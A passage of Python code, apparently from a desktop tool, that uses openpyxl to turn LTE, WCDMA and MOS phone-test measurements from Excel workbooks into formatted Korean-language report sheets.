'Band 7 20M'\n sheet_out['B29'] = '-84.00dBm'\n sheet_out['C29'] = list_lte_tis[8] + 'dBm'\n # sheet_out['D29'] = self.check_num(abs(round(abs(float(list_lte_tis[8])) - 84.00, 2))) + 'dBm'\n sheet_out['D29'] = self.cal_comparison(84.00, list_lte_tis[8]) + 'dBm'\n sheet_out['A30'] = 'Band 7 10M'\n sheet_out['B30'] = '-87.00dBm'\n sheet_out['C30'] = list_lte_tis[9] + 'dBm'\n # sheet_out['D30'] = self.check_num(abs(round(abs(float(list_lte_tis[9])) - 87.00, 2))) + 'dBm'\n sheet_out['D30'] = self.cal_comparison(87.00, list_lte_tis[9]) + 'dBm'\n\n self.setPrintText('/s {}번 파일 \"TIS\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D30\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['A8'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment\n sheet_out['A24'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D6\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A9:D14\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A16:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A21:D22\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A25:D30\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:D30\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n\n for i in [5, 9, 16, 21, 25]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [6, 10, 11, 12, 13, 14, 17, 22, 26, 27, 28, 29, 30]:\n sheet_out['A'+str(i)].fill = self.gray_fill\n sheet_out['B'+str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"TIS\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 속도 Tab\n def spd_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_lte_spd = []\n\n # get data from wb_input\n sheet_in = wb_input['LTE OTA']\n # MIMO\n list_lte_spd.append(self.check_num(sheet_in['I25'].value))\n list_lte_spd.append(self.check_num(sheet_in['J25'].value))\n list_lte_spd.append(self.check_num(sheet_in['K25'].value))\n list_lte_spd.append(self.check_num(sheet_in['F25'].value))\n list_lte_spd.append(self.check_num(sheet_in['G25'].value))\n list_lte_spd.append(self.check_num(sheet_in['H25'].value))\n list_lte_spd.append(self.check_num(sheet_in['C25'].value))\n list_lte_spd.append(self.check_num(sheet_in['D25'].value))\n list_lte_spd.append(self.check_num(sheet_in['E25'].value))\n list_lte_spd.append(self.check_num(sheet_in['L25'].value))\n list_lte_spd.append(self.check_num(sheet_in['M25'].value))\n list_lte_spd.append(self.check_num(sheet_in['N25'].value))\n list_lte_spd.append(self.check_num(sheet_in['O25'].value))\n list_lte_spd.append(self.check_num(sheet_in['P25'].value))\n list_lte_spd.append(self.check_num(sheet_in['Q25'].value))\n # CA\n list_lte_spd.append(self.check_num(sheet_in['C33'].value))\n list_lte_spd.append(self.check_num(sheet_in['D33'].value))\n list_lte_spd.append(self.check_num(sheet_in['E33'].value))\n list_lte_spd.append(self.check_num(sheet_in['F33'].value))\n list_lte_spd.append(self.check_num(sheet_in['G33'].value))\n list_lte_spd.append(self.check_num(sheet_in['H33'].value))\n list_lte_spd.append(self.check_num(sheet_in['I33'].value))\n list_lte_spd.append(self.check_num(sheet_in['J33'].value))\n list_lte_spd.append(self.check_num(sheet_in['K33'].value))\n list_lte_spd.append(self.check_num(sheet_in['L33'].value))\n list_lte_spd.append(self.check_num(sheet_in['M33'].value))\n list_lte_spd.append(self.check_num(sheet_in['N33'].value))\n list_lte_spd.append(self.check_num(sheet_in['O33'].value))\n list_lte_spd.append(self.check_num(sheet_in['P33'].value))\n list_lte_spd.append(self.check_num(sheet_in['Q33'].value))\n list_lte_spd.append(self.check_num(sheet_in['R33'].value))\n list_lte_spd.append(self.check_num(sheet_in['S33'].value))\n list_lte_spd.append(self.check_num(sheet_in['T33'].value))\n\n #option setting wb.output\n sheet_out = wb_output['속도']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = '속도 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ MIMO 속도'\n sheet_out['A4'] = ' - LTE'\n\n # sheet row 5 and 20 handle\n sheet_out['A5'] = '구분'\n sheet_out.merge_cells('B5:C5')\n sheet_out['B5'] = '기준(Free)'\n sheet_out['D5'] = '측정결과'\n sheet_out['E5'] = '비교'\n\n sheet_out.merge_cells('A6:A8')\n sheet_out['A6'] = 'Band 1 15M(MCS28)'\n sheet_out['B6'] = 'RSSI'\n sheet_out['B7'] = '속도(Absolute)'\n sheet_out['B8'] = 'BLER'\n sheet_out['C6'] = '-61.00dBm'\n sheet_out['C7'] = '87700Kbps'\n sheet_out['C8'] = '20.00%'\n sheet_out['D6'] = list_lte_spd[0] + 'dBm'\n sheet_out['D7'] = list_lte_spd[1] + 'Kbps'\n sheet_out['D8'] = list_lte_spd[2] + '%'\n # sheet_out['E6'] = self.check_num(abs(round(abs(float(list_lte_spd[0])) - 61.00, 2))) + 'dBm'\n # sheet_out['E7'] = self.check_num(abs(round(abs(float(list_lte_spd[1])) - 87700, 2))) + 'Kbps'\n # sheet_out['E8'] = self.check_num(abs(round(abs(float(list_lte_spd[2])) - 20.00, 2))) + '%'\n sheet_out['E6'] = self.cal_comparison(61.00, list_lte_spd[0]) + 'dBm'\n sheet_out['E7'] = self.cal_comparison(87700.00, list_lte_spd[1]) + 'Kbps'\n sheet_out['E8'] = self.cal_comparison(20.00, list_lte_spd[2]) + '%'\n\n sheet_out.merge_cells('A9:A11')\n sheet_out['A9'] = 'Band 3 20M(MCS28)'\n sheet_out['B9'] = 'RSSI'\n sheet_out['B10'] = '속도(Absolute)'\n sheet_out['B11'] = 'BLER'\n sheet_out['C9'] = '-61.00dBm'\n sheet_out['C10'] = '119900Kbps'\n sheet_out['C11'] = '20.00%'\n sheet_out['D9'] = list_lte_spd[3] + 'dBm'\n sheet_out['D10'] = list_lte_spd[4] + 'Kbps'\n sheet_out['D11'] = list_lte_spd[5] + '%'\n # sheet_out['E9'] = self.check_num(abs(round(abs(float(list_lte_spd[3])) - 61.00, 2))) + 'dBm'\n # sheet_out['E10'] = self.check_num(abs(round(abs(float(list_lte_spd[4])) - 119900, 2))) + 'Kbps'\n # sheet_out['E11'] = self.check_num(abs(round(abs(float(list_lte_spd[5])) - 20.00, 2))) + '%'\n sheet_out['E9'] = self.cal_comparison(61.00, list_lte_spd[3]) + 'dBm'\n sheet_out['E10'] = self.cal_comparison(119900.00, list_lte_spd[4]) + 'Kbps'\n sheet_out['E11'] = self.cal_comparison(20.00, list_lte_spd[5]) + '%'\n\n sheet_out.merge_cells('A12:A14')\n sheet_out['A12'] = 'Band 5 10M(MCS27)'\n sheet_out['B12'] = 'RSSI'\n sheet_out['B13'] = '속도(Absolute)'\n sheet_out['B14'] = 'BLER'\n sheet_out['C12'] = '-60.00dBm'\n sheet_out['C13'] = '50300Kbps'\n sheet_out['C14'] = '20.00%'\n sheet_out['D12'] = list_lte_spd[6] + 'dBm'\n sheet_out['D13'] = list_lte_spd[7] + 'Kbps'\n sheet_out['D14'] = list_lte_spd[8] + '%'\n # sheet_out['E12'] = self.check_num(abs(round(abs(float(list_lte_spd[6])) - 60.00, 2))) + 'dBm'\n # sheet_out['E13'] = self.check_num(abs(round(abs(float(list_lte_spd[7])) - 50300, 2))) + 'Kbps'\n # sheet_out['E14'] = self.check_num(abs(round(abs(float(list_lte_spd[8])) - 20.00, 2))) + '%'\n sheet_out['E12'] = self.cal_comparison(60.00, list_lte_spd[6]) + 'dBm'\n sheet_out['E13'] = self.cal_comparison(50300.00, list_lte_spd[7]) + 'Kbps'\n sheet_out['E14'] = self.cal_comparison(20.00, list_lte_spd[8]) + '%'\n\n sheet_out.merge_cells('A15:A17')\n sheet_out['A15'] = 'Band 7 20M(MCS28)'\n sheet_out['B15'] = 'RSSI'\n sheet_out['B16'] = '속도(Absolute)'\n sheet_out['B17'] = 'BLER'\n sheet_out['C15'] = '-60.00dBm'\n sheet_out['C16'] = '119900Kbps'\n sheet_out['C17'] = '20.00%'\n sheet_out['D15'] = list_lte_spd[9] + 'dBm'\n sheet_out['D16'] = list_lte_spd[10] + 'Kbps'\n sheet_out['D17'] = list_lte_spd[11] + '%'\n # sheet_out['E15'] = self.check_num(abs(round(abs(float(list_lte_spd[9])) - 60.00, 2))) + 'dBm'\n # sheet_out['E16'] = self.check_num(abs(round(abs(float(list_lte_spd[10])) - 119900, 2))) + 'Kbps'\n # sheet_out['E17'] = self.check_num(abs(round(abs(float(list_lte_spd[11])) - 20.00, 2))) + '%'\n sheet_out['E15'] = self.cal_comparison(60.00, list_lte_spd[9]) + 'dBm'\n sheet_out['E16'] = self.cal_comparison(119900.00, list_lte_spd[10]) + 'Kbps'\n sheet_out['E17'] = self.cal_comparison(20.00, list_lte_spd[11]) + '%'\n\n sheet_out.merge_cells('A18:A20')\n sheet_out['A18'] = 'Band 7 10M(MCS27)'\n sheet_out['B18'] = 'RSSI'\n sheet_out['B19'] = '속도(Absolute)'\n sheet_out['B20'] = 'BLER'\n sheet_out['C18'] = '-60.00dBm'\n sheet_out['C19'] = '50300Kbps'\n sheet_out['C20'] = '20.00%'\n sheet_out['D18'] = list_lte_spd[12] + 'dBm'\n sheet_out['D19'] = list_lte_spd[13] + 'Kbps'\n sheet_out['D20'] = list_lte_spd[14] + '%'\n # sheet_out['E18'] = self.check_num(abs(round(abs(float(list_lte_spd[12])) - 60.00, 2))) + 'dBm'\n # sheet_out['E19'] = self.check_num(abs(round(abs(float(list_lte_spd[13])) - 50300, 2))) + 'Kbps'\n # sheet_out['E20'] = self.check_num(abs(round(abs(float(list_lte_spd[14])) - 20.00, 2))) + '%'\n sheet_out['E18'] = self.cal_comparison(60.00, list_lte_spd[12]) + 'dBm'\n sheet_out['E19'] = self.cal_comparison(50300.00, list_lte_spd[13]) + 'Kbps'\n sheet_out['E20'] = self.cal_comparison(20.00, list_lte_spd[14]) + '%'\n\n\n # 22 ~ 23 row\n sheet_out['A22'] = '▣ CA 속도'\n sheet_out['A23'] = ' - LTE'\n\n # sheet row 24 and 42 handle\n sheet_out['A24'] = '구분'\n sheet_out.merge_cells('B24:C24')\n sheet_out['B24'] = '기준(Free)'\n sheet_out['D24'] = '측정결과'\n sheet_out['E24'] = '비교'\n\n sheet_out.merge_cells('A25:A27')\n sheet_out['A25'] = '2CA : B3+B5(MCS28)'\n sheet_out['B25'] = 'RSSI'\n sheet_out['B26'] = '속도(Absolute)'\n sheet_out['B27'] = 'BLER'\n sheet_out['C25'] = '-58.00dBm'\n sheet_out['C26'] = '178390Kbps'\n sheet_out['C27'] = '-'\n sheet_out['D25'] = list_lte_spd[15] + 'dBm'\n sheet_out['D26'] = list_lte_spd[16] + 'Kbps'\n sheet_out['D27'] = list_lte_spd[17] + '%'\n # sheet_out['E25'] = self.check_num(abs(round(abs(float(list_lte_spd[15])) - 58.00, 2))) + 'dBm'\n # sheet_out['E26'] = self.check_num(abs(round(abs(float(list_lte_spd[16])) - 178390, 2))) + 'Kbps'\n sheet_out['E25'] = self.cal_comparison(58.00, list_lte_spd[15]) + 'dBm'\n sheet_out['E26'] = self.cal_comparison(178390.00, list_lte_spd[16]) + 'Kbps'\n sheet_out['E27'] = '-'\n\n sheet_out.merge_cells('A28:A30')\n sheet_out['A28'] = '3CA : B7(20M)+B3+B1(MCS28)'\n sheet_out['B28'] = 'RSSI'\n sheet_out['B29'] = '속도(Absolute)'\n sheet_out['B30'] = 'BLER'\n sheet_out['C28'] = '-58.00dBm'\n sheet_out['C29'] = '327500Kbps'\n sheet_out['C30'] = '-'\n sheet_out['D28'] = list_lte_spd[18] + 'dBm'\n sheet_out['D29'] = list_lte_spd[19] + 'Kbps'\n sheet_out['D30'] = list_lte_spd[20] + '%'\n # sheet_out['E28'] = self.check_num(abs(round(abs(float(list_lte_spd[18])) - 58.00, 2))) + 'dBm'\n # sheet_out['E29'] = self.check_num(abs(round(abs(float(list_lte_spd[19])) - 327500, 2))) + 'Kbps'\n sheet_out['E28'] = self.cal_comparison(58.00, list_lte_spd[18]) + 'dBm'\n sheet_out['E29'] = self.cal_comparison(327500.00, list_lte_spd[19]) + 'Kbps'\n sheet_out['E30'] = '-'\n\n sheet_out.merge_cells('A31:A33')\n sheet_out['A31'] = '3CA : B7(20M)+B3+B5(MCS28)'\n sheet_out['B31'] = 'RSSI'\n sheet_out['B32'] = '속도(Absolute)'\n sheet_out['B33'] = 'BLER'\n sheet_out['C31'] = '-58.00dBm'\n sheet_out['C32'] = '298300Kbps'\n sheet_out['C33'] = '-'\n sheet_out['D31'] = list_lte_spd[21] + 'dBm'\n sheet_out['D32'] = list_lte_spd[22] + 'Kbps'\n sheet_out['D33'] = list_lte_spd[23] + '%'\n # sheet_out['E31'] = self.check_num(abs(round(abs(float(list_lte_spd[21])) - 58.00, 2))) + 'dBm'\n # sheet_out['E32'] = self.check_num(abs(round(abs(float(list_lte_spd[22])) - 298300, 2))) + 'Kbps'\n sheet_out['E31'] = self.cal_comparison(58.00, list_lte_spd[21]) + 'dBm'\n sheet_out['E32'] = self.cal_comparison(298300.00, list_lte_spd[22]) + 'Kbps'\n sheet_out['E33'] = '-'\n\n sheet_out.merge_cells('A34:A36')\n sheet_out['A34'] = '3CA : B7(20M)+B3+B7(MCS28)'\n sheet_out['B34'] = 'RSSI'\n sheet_out['B35'] = '속도(Absolute)'\n sheet_out['B36'] = 'BLER'\n sheet_out['C34'] = '-58.00dBm'\n sheet_out['C35'] = '298300Kbps'\n sheet_out['C36'] = '-'\n sheet_out['D34'] = list_lte_spd[24] + 'dBm'\n sheet_out['D35'] = list_lte_spd[25] + 'Kbps'\n sheet_out['D36'] = list_lte_spd[26] + '%'\n # sheet_out['E34'] = self.check_num(abs(round(abs(float(list_lte_spd[24])) - 58.00, 2))) + 'dBm'\n # sheet_out['E35'] = self.check_num(abs(round(abs(float(list_lte_spd[25])) - 298300, 2))) + 'Kbps'\n sheet_out['E34'] = self.cal_comparison(58.00, list_lte_spd[24]) + 'dBm'\n sheet_out['E35'] = self.cal_comparison(298300.00, list_lte_spd[25]) + 'Kbps'\n sheet_out['E36'] = '-'\n\n sheet_out.merge_cells('A37:A39')\n sheet_out['A37'] = '4CA : B7(20M)+B3+B5+B1(MCS28)'\n sheet_out['B37'] = 'RSSI'\n sheet_out['B38'] = '속도(Absolute)'\n sheet_out['B39'] = 'BLER'\n sheet_out['C37'] = '-57.00dBm'\n sheet_out['C38'] = '386000Kbps'\n sheet_out['C39'] = '-'\n sheet_out['D37'] = list_lte_spd[27] + 'dBm'\n sheet_out['D38'] = list_lte_spd[28] + 'Kbps'\n sheet_out['D39'] = list_lte_spd[29] + '%'\n # sheet_out['E37'] = self.check_num(abs(round(abs(float(list_lte_spd[27])) - 57.00, 2))) + 'dBm'\n # sheet_out['E38'] = self.check_num(abs(round(abs(float(list_lte_spd[28])) - 386000, 2))) + 'Kbps'\n sheet_out['E37'] = self.cal_comparison(57.00, list_lte_spd[27]) + 'dBm'\n sheet_out['E38'] = self.cal_comparison(386000.00, list_lte_spd[28]) + 'Kbps'\n sheet_out['E39'] = '-'\n\n sheet_out.merge_cells('A40:A42')\n sheet_out['A40'] = '5CA : B7+B3+B5+B1+B7(MCS28)'\n sheet_out['B40'] = 'RSSI'\n sheet_out['B41'] = '속도(Absolute)'\n sheet_out['B42'] = 'BLER'\n sheet_out['C40'] = '-56.00dBm'\n sheet_out['C41'] = '444500Kbps'\n sheet_out['C42'] = '-'\n sheet_out['D40'] = list_lte_spd[30] + 'dBm'\n sheet_out['D41'] = list_lte_spd[31] + 'Kbps'\n sheet_out['D42'] = list_lte_spd[32] + '%'\n # sheet_out['E40'] = self.check_num(abs(round(abs(float(list_lte_spd[30])) - 56.00, 2))) + 'dBm'\n # sheet_out['E41'] = self.check_num(abs(round(abs(float(list_lte_spd[31])) - 444500, 2))) + 'Kbps'\n sheet_out['E40'] = self.cal_comparison(56.00, list_lte_spd[30]) + 'dBm'\n sheet_out['E41'] = self.cal_comparison(444500.00, list_lte_spd[31]) + 'Kbps'\n sheet_out['E42'] = '-'\n\n self.setPrintText('/s {}번 파일 \"속도\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:E42\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['A22'].alignment = self.top_alignment\n sheet_out['A23'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:E20\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell border adjust\n for mCell in sheet_out[\"A24:E42\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:E42\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n sheet_width_list = [20.63, 14, 14, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [6, 9, 12, 15, 18, 25, 28, 31, 34, 37, 40]:\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n for col in ['A', 'B', 'D', 'E']:\n sheet_out[col + '5'].fill = self.brown_fill\n sheet_out[col + '24'].fill = self.brown_fill\n\n for i in range(6, 21):\n sheet_out['B'+str(i)].fill = self.apricot_fill\n sheet_out['C'+str(i)].fill = self.apricot_fill\n\n for i in range(25, 43):\n sheet_out['B'+str(i)].fill = self.apricot_fill\n sheet_out['C'+str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"속도\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # Call Setup Tab\n def call_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n call_val = ''\n\n # get data from wb_input\n sheet_in = wb_input['Call Test']\n\n call_val = self.check_num(sheet_in['D8'].value)\n\n #option setting wb.output\n sheet_out = wb_output['Call Setup Test']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = 'Call Setup Test 결과'\n\n # 3~4 row\n sheet_out['A2'] = ' - WCDMA Call Setup Test'\n sheet_out['A3'] = '구분'\n sheet_out['B3'] = '기준'\n sheet_out['C3'] = '측정결과'\n sheet_out['D3'] = '비교'\n sheet_out['A4'] = 'Band 1'\n sheet_out['B4'] = ' -104.5dBm 이하'\n sheet_out['C4'] = call_val\n sheet_out['D4'] = '-'\n\n self.setPrintText('/s {}번 파일 \"Call Setuo Test\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D4\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A2'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A3:D4\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D4\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n sheet_out['A4'].fill = self.gray_fill\n\n for col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '3'].fill = self.brown_fill\n\n sheet_out['B4'].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"Call Setup Test\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 주파수동조 Tab\n def fre_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_c1 = []\n list_c2 = []\n list_c3 = []\n # get data from wb_input\n sheet_in = wb_input['주파수동조']\n\n for i in ['C', 'D', 'E', 'F']:\n list_c1.append(str(sheet_in[i + '5'].value))\n list_c1.append(str(sheet_in[i + '6'].value))\n list_c1.append(str(sheet_in[i + '7'].value))\n\n for i in ['C', 'D']:\n list_c2.append(str(sheet_in[i + '11'].value))\n list_c2.append(str(sheet_in[i + '12'].value))\n list_c2.append(str(sheet_in[i + '13'].value))\n\n for i in ['C', 'D', 'E', 'F']:\n list_c3.append(str(sheet_in[i + '17'].value))\n list_c3.append(str(sheet_in[i + '18'].value))\n list_c3.append(str(sheet_in[i + '19'].value))\n\n # option setting wb.output\n sheet_out = wb_output['주파수동조']\n\n # sheet row 2 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = '주파수동조 결과'\n\n # 3~8 row\n sheet_out['A3'] = '▣ LTE'\n sheet_out.merge_cells('A4:B4')\n sheet_out['A4'] = '지원 Band 및 정보'\n sheet_out['C4'] = '측정결과'\n sheet_out['D4'] = '비고'\n i = 0\n j = 0\n while i < len(list_c1):\n\n sheet_out['A' + str(5 + j)] = list_c1[i]\n sheet_out['B' + str(5 + j)] = list_c1[i+1]\n sheet_out['C' + str(5 + j)] = list_c1[i+2]\n sheet_out['D' + str(5 + j)] = ''\n i = i + 3\n j = j + 1\n\n # 10~13 row\n sheet_out['A10'] = '▣ WCDMA'\n sheet_out.merge_cells('A11:B11')\n sheet_out['A11'] = '지원 Band 및 정보'\n sheet_out['C11'] = '측정결과'\n sheet_out['D11'] = '비고'\n i = 0\n j = 0\n while i < len(list_c2):\n sheet_out['A' + str(12 + j)] = list_c2[i]\n sheet_out['B' + str(12 + j)] = list_c2[i + 1]\n sheet_out['C' + str(12 + j)] = list_c2[i + 2]\n sheet_out['D' + str(12 + j)] = ''\n i = i + 3\n j = j + 1\n\n # 15~20 row\n sheet_out['A15'] = '▣ GMS'\n sheet_out.merge_cells('A16:B16')\n sheet_out['A16'] = '지원 Band 및 정보'\n sheet_out['C16'] = '측정결과'\n sheet_out['D16'] = '비고'\n i = 0\n j = 0\n while i < len(list_c3):\n sheet_out['A' + str(17 + j)] = list_c3[i]\n sheet_out['B' + str(17 + j)] = list_c3[i + 1]\n sheet_out['C' + str(17 + j)] = list_c3[i + 2]\n sheet_out['D' + str(17 + j)] = ''\n i = i + 3\n j = j + 1\n\n self.setPrintText('/s {}번 파일 \"주파수동조\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D20\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A10'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:D8\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A11:D13\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A16:D20\"]:\n for cell in mCell:\n cell.border = self.thin_border\n # all cell font adjust\n for mCell in sheet_out[\"A3:D20\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [15.13, 24.5, 17, 15]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [5, 6, 7, 8, 12, 13, 17, 18, 19, 20]:\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n\n for i in [4, 11, 16]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"주파수동조\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # Call Setup Tab\n def mos_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_val = []\n\n # get data from wb_input\n sheet_in = wb_input['MOS']\n list_val.append(self.check_num(sheet_in['C6'].value))\n list_val.append(self.check_num(sheet_in['D6'].value))\n list_val.append(self.check_num(sheet_in['E6'].value))\n list_val.append(self.check_num(sheet_in['F6'].value))\n\n #option setting wb.output\n sheet_out = wb_output['MOS']\n # sheet row 1 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = 'MOS 결과'\n\n # sheet row 2 handle\n sheet_out['A2'] = '- MOS 결과'\n sheet_out['A3'] = '▣ POLQA_48K'\n\n # 4~6 row\n sheet_out['A4'] = '구분'\n sheet_out['B4'] = '기준'\n sheet_out['C4'] = '측정결과'\n sheet_out['D4'] = '비교'\n sheet_out['A5'] = 'Downlink MOS'\n sheet_out['B5'] = '3.5 이상'\n sheet_out['C5'] = list_val[0]\n # sheet_out['D5'] = self.check_num(abs(round(abs(float(list_val[0])) - 3.5, 2)))\n sheet_out['D5'] = self.cal_comparison(3.5, list_val[0])\n sheet_out['A6'] = 'Uplink MOS'\n sheet_out['B6'] = '3.5 이상'\n sheet_out['C6'] = list_val[1]\n # sheet_out['D6'] = self.check_num(abs(round(abs(float(list_val[1])) - 3.5, 2)))\n sheet_out['D6'] = self.cal_comparison(3.5, list_val[1])\n\n # sheet row 8 handle\n sheet_out['A8'] = '▣ POLQA_8K'\n\n # 9~11 row\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = '기준'\n sheet_out['C9'] = '측정결과'\n sheet_out['A10'] = 'Downlink MOS'\n sheet_out['B10'] = '3.0 이상'\n sheet_out['C10'] = list_val[2]\n # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_val[2])) - 3.0, 2)))\n sheet_out['D10'] = self.cal_comparison(3.0, list_val[2])\n sheet_out['A11'] = 'Uplink MOS'\n sheet_out['B11'] = '3.0 이상'\n sheet_out['C11'] = list_val[3]\n # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_val[3])) - 3.0, 2)))\n sheet_out['D11'] = self.cal_comparison(3.0, list_val[2])\n\n self.setPrintText('/s {}번 파일 \"MOS\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D11\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A2'].alignment = self.top_alignment\n sheet_out['A3'].alignment = self.top_alignment\n 